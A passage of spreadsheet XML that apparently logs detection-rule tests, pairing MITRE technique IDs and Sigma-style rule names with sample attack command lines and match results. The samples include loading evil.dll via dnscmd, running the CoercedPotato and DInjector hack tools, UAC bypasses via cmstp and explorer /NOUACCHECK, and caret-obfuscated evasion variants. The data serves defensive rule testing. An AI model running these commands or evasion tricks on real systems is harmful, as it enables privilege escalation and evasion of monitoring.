          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D3919" s="44" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E3919" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\DeviceEnroller.exe\t/PhoneDeepLink\tAnyStringDataHere</t>
        </is>
      </c>
      <c r="F3919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3919" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3919" s="44" t="n"/>
      <c r="J3919" s="44" t="n"/>
      <c r="K3919" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3920" ht="15.75" customHeight="1" s="42">
      <c r="A3920" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3920" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dnscmd_install_new_server_level_plugin_dll</t>
        </is>
      </c>
      <c r="C3920" s="44" t="inlineStr">
        <is>
          <t>New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE</t>
        </is>
      </c>
      <c r="D3920" s="44" t="inlineStr">
        <is>
          <t>f63b56ee-3f79-4b8a-97fb-5c48007e8573</t>
        </is>
      </c>
      <c r="E3920" s="44" t="inlineStr">
        <is>
          <t>dnscmd.exe "/config" "/serverlevelplugindll" C:\Temp\evil.dll</t>
        </is>
      </c>
      <c r="F3920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3920" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3920" s="44" t="n"/>
      <c r="J3920" s="44" t="n"/>
      <c r="K3920" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3921" ht="15.75" customHeight="1" s="42">
      <c r="A3921" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3921" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dnscmd_install_new_server_level_plugin_dll</t>
        </is>
      </c>
      <c r="C3921" s="44" t="inlineStr">
        <is>
          <t>New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE</t>
        </is>
      </c>
      <c r="D3921" s="44" t="inlineStr">
        <is>
          <t>f63b56ee-3f79-4b8a-97fb-5c48007e8573</t>
        </is>
      </c>
      <c r="E3921" s="44" t="inlineStr">
        <is>
          <t>dnscmd.exe	/config	/serverlevelplugindll	C:\Temp\evil.dll</t>
        </is>
      </c>
      <c r="F3921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3921" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3921" s="44" t="n"/>
      <c r="J3921" s="44" t="n"/>
      <c r="K3921" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3922" ht="15.75" customHeight="1" s="42">
      <c r="A3922" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3922" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C3922" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D3922" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E3922" s="44" t="inlineStr">
        <is>
          <t>copy /Y C:\Temp\test.txt C:\Windows\System32\Tasks\</t>
        </is>
      </c>
      <c r="F3922" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3922" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3922" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion (cc4e02ba-9c06-48e2-b09e-2500cace9ae0); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3922" s="44" t="n"/>
      <c r="K3922" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3923" ht="15.75" customHeight="1" s="42">
      <c r="A3923" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3923" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C3923" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D3923" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E3923" s="44" t="inlineStr">
        <is>
          <t>copy C:\Temp\test.txt \Windows\System32\Tasks\test.txt</t>
        </is>
      </c>
      <c r="F3923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3923" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3923" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3923" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J3923" s="44" t="n"/>
      <c r="K3923" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3924" ht="15.75" customHeight="1" s="42">
      <c r="A3924" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3924" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C3924" s="44" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D3924" s="44" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E3924" s="44" t="inlineStr">
        <is>
          <t>dllhost.exe</t>
        </is>
      </c>
      <c r="F3924" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3924" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3924" s="44" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly (e7888eb1-13b0-4616-bd99-4bc0c2b054b9)</t>
        </is>
      </c>
      <c r="J3924" s="44" t="n"/>
      <c r="K3924" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3925" ht="15.75" customHeight="1" s="42">
      <c r="A3925" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3925" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dllhost_no_cli_execution</t>
        </is>
      </c>
      <c r="C3925" s="44" t="inlineStr">
        <is>
          <t>Dllhost.EXE Execution Anomaly</t>
        </is>
      </c>
      <c r="D3925" s="44" t="inlineStr">
        <is>
          <t>e7888eb1-13b0-4616-bd99-4bc0c2b054b9</t>
        </is>
      </c>
      <c r="E3925" s="44" t="inlineStr">
        <is>
          <t>"dllhost.exe"</t>
        </is>
      </c>
      <c r="F3925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3925" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3925" s="44" t="n"/>
      <c r="J3925" s="44" t="n"/>
      <c r="K3925" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3926" ht="15.75" customHeight="1" s="42">
      <c r="A3926" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3926" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_coercedpotato</t>
        </is>
      </c>
      <c r="C3926" s="44" t="inlineStr">
        <is>
          <t>HackTool - CoercedPotato Execution</t>
        </is>
      </c>
      <c r="D3926" s="44" t="inlineStr">
        <is>
          <t>e8d34729-86a4-4140-adfd-0a29c2106307</t>
        </is>
      </c>
      <c r="E3926" s="44" t="inlineStr">
        <is>
          <t>CoercedPotato.exe --exploitId	1</t>
        </is>
      </c>
      <c r="F3926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3926" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3926" s="44" t="n"/>
      <c r="J3926" s="44" t="n"/>
      <c r="K3926" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3927" ht="15.75" customHeight="1" s="42">
      <c r="A3927" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3927" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_coercedpotato</t>
        </is>
      </c>
      <c r="C3927" s="44" t="inlineStr">
        <is>
          <t>HackTool - CoercedPotato Execution</t>
        </is>
      </c>
      <c r="D3927" s="44" t="inlineStr">
        <is>
          <t>e8d34729-86a4-4140-adfd-0a29c2106307</t>
        </is>
      </c>
      <c r="E3927" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c CoercedPotato.exe --exploitId^  1</t>
        </is>
      </c>
      <c r="F3927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3927" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3927" s="44" t="n"/>
      <c r="J3927" s="44" t="n"/>
      <c r="K3927" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3928" ht="15.75" customHeight="1" s="42">
      <c r="A3928" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3928" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C3928" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D3928" s="44" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E3928" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass .\DInjector.ps1 -am51 -password 'Secret123'</t>
        </is>
      </c>
      <c r="F3928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3928" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3928" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3928" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3928" s="44" t="n"/>
      <c r="K3928" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3929" ht="15.75" customHeight="1" s="42">
      <c r="A3929" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3929" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C3929" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D3929" s="44" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E3929" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c powershell.exe .\DInjector.ps1 /am^51 /pass^word 'Secret123'</t>
        </is>
      </c>
      <c r="F3929" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3929" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3929" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution (d78b5d61-187d-44b6-bf02-93486a80de5a)</t>
        </is>
      </c>
      <c r="J3929" s="44" t="n"/>
      <c r="K3929" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3930" ht="15.75" customHeight="1" s="42">
      <c r="A3930" s="44" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B3930" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_dinjector</t>
        </is>
      </c>
      <c r="C3930" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution</t>
        </is>
      </c>
      <c r="D3930" s="44" t="inlineStr">
        <is>
          <t>d78b5d61-187d-44b6-bf02-93486a80de5a</t>
        </is>
      </c>
      <c r="E3930" s="44" t="inlineStr">
        <is>
          <t>powershell.exe .\DInjector.ps1  /am51  /password  'Secret123'</t>
        </is>
      </c>
      <c r="F3930" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3930" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3930" s="44" t="inlineStr">
        <is>
          <t>HackTool - DInjector PowerShell Cradle Execution (d78b5d61-187d-44b6-bf02-93486a80de5a); HackTool - DInjector PowerShell Cradle Execution (d78b5d61-187d-44b6-bf02-93486a80de5a)</t>
        </is>
      </c>
      <c r="J3930" s="44" t="n"/>
      <c r="K3930" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3931" ht="15.75" customHeight="1" s="42">
      <c r="A3931" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3931" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C3931" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D3931" s="44" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E3931" s="44" t="inlineStr">
        <is>
          <t>explorer.exe "/NOUACCHECK"</t>
        </is>
      </c>
      <c r="F3931" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3931" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3931" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J3931" s="44" t="n"/>
      <c r="K3931" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3932" ht="15.75" customHeight="1" s="42">
      <c r="A3932" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3932" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C3932" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D3932" s="44" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E3932" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c explorer.exe /NOUAC^CHECK</t>
        </is>
      </c>
      <c r="F3932" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3932" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3932" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J3932" s="44" t="n"/>
      <c r="K3932" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3933" ht="15.75" customHeight="1" s="42">
      <c r="A3933" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3933" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C3933" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D3933" s="44" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E3933" s="44" t="inlineStr">
        <is>
          <t>explorer.exe\t/NOUACCHECK</t>
        </is>
      </c>
      <c r="F3933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3933" s="44" t="n"/>
      <c r="J3933" s="44" t="n"/>
      <c r="K3933" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3934" ht="15.75" customHeight="1" s="42">
      <c r="A3934" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3934" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_explorer_nouaccheck</t>
        </is>
      </c>
      <c r="C3934" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag</t>
        </is>
      </c>
      <c r="D3934" s="44" t="inlineStr">
        <is>
          <t>534f2ef7-e8a2-4433-816d-c91bccde289b</t>
        </is>
      </c>
      <c r="E3934" s="44" t="inlineStr">
        <is>
          <t>explorer.exe /nouaccheck</t>
        </is>
      </c>
      <c r="F3934" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3934" s="44" t="inlineStr">
        <is>
          <t>Explorer NOUACCHECK Flag (534f2ef7-e8a2-4433-816d-c91bccde289b)</t>
        </is>
      </c>
      <c r="J3934" s="44" t="n"/>
      <c r="K3934" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3935" ht="15.75" customHeight="1" s="42">
      <c r="A3935" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3935" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C3935" s="44" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D3935" s="44" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E3935" s="44" t="inlineStr">
        <is>
          <t>cmstp.exe "/s" "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003.inf"</t>
        </is>
      </c>
      <c r="F3935" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3935" s="44" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J3935" s="44" t="n"/>
      <c r="K3935" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3936" ht="15.75" customHeight="1" s="42">
      <c r="A3936" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3936" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C3936" s="44" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D3936" s="44" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E3936" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cmstp.exe /^s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003.inf"</t>
        </is>
      </c>
      <c r="F3936" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3936" s="44" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J3936" s="44" t="n"/>
      <c r="K3936" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3937" ht="15.75" customHeight="1" s="42">
      <c r="A3937" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3937" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C3937" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D3937" s="44" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E3937" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\dismhost.exe {A0000000-0000-0000-0000-000000000000} /ServiceSession:1</t>
        </is>
      </c>
      <c r="F3937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3937" s="44" t="n"/>
      <c r="J3937" s="44" t="n"/>
      <c r="K3937" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3938" ht="15.75" customHeight="1" s="42">
      <c r="A3938" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3938" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C3938" s="44" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D3938" s="44" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E3938" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\system32\wusa.exe"   /quiet "C:\Users\Public\AppData\Local\Temp\update.msu"</t>
        </is>
      </c>
      <c r="F3938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3938" s="44" t="n"/>
      <c r="J3938" s="44" t="n"/>
      <c r="K3938" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3939" ht="15.75" customHeight="1" s="42">
      <c r="A3939" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3939" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C3939" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D3939" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E3939" s="44" t="inlineStr">
        <is>
          <t>winget install --manifest=C:\Temp\test.yaml</t>
        </is>
      </c>
      <c r="F3939" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3939" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3939" s="44" t="n"/>
      <c r="K3939" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3940" ht="15.75" customHeight="1" s="42">
      <c r="A3940" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3940" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C3940" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D3940" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E3940" s="44" t="inlineStr">
        <is>
          <t>winget --manifest C:\Temp\test.yaml install</t>
        </is>
      </c>
      <c r="F3940" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3940" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3940" s="44" t="n"/>
      <c r="K3940" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3941" ht="15.75" customHeight="1" s="42">
      <c r="A3941" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3941" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C3941" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D3941" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E3941" s="44" t="inlineStr">
        <is>
          <t>winget "install" --manifest C:\Temp\test.yaml</t>
        </is>
      </c>
      <c r="F3941" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3941" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3941" s="44" t="n"/>
      <c r="K3941" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3942" ht="15.75" customHeight="1" s="42">
      <c r="A3942" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3942" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C3942" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D3942" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E3942" s="44" t="inlineStr">
        <is>
          <t>winget.exe install -m  C:\Temp\test.yaml</t>
        </is>
      </c>
      <c r="F3942" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3942" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest (313d6012-51a0-4d93-8dfc-de8553239e25)</t>
        </is>
      </c>
      <c r="J3942" s="44" t="n"/>
      <c r="K3942" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3943" ht="15.75" customHeight="1" s="42">
      <c r="A3943" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3943" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C3943" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3943" s="44" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E3943" s="44" t="inlineStr">
        <is>
          <t>hh.exe "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.chm "</t>
        </is>
      </c>
      <c r="F3943" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3943" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3943" s="44" t="n"/>
      <c r="K3943" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3944" ht="15.75" customHeight="1" s="42">
      <c r="A3944" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3944" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_execution</t>
        </is>
      </c>
      <c r="C3944" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3944" s="44" t="inlineStr">
        <is>
          <t>68c8acb4-1b60-4890-8e82-3ddf7a6dba84</t>
        </is>
      </c>
      <c r="E3944" s="44" t="inlineStr">
        <is>
          <t>hh.exe -decompile C:\Users\thaim\AppData\Local\Temp "C:\AtomicRedTeam\atomics\T1218.001\src\T1218.001.CHM"</t>
        </is>
      </c>
      <c r="F3944" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3944" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3944" s="44" t="n"/>
      <c r="K3944" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3945" ht="15.75" customHeight="1" s="42">
      <c r="A3945" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3945" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C3945" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D3945" s="44" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E3945" s="44" t="inlineStr">
        <is>
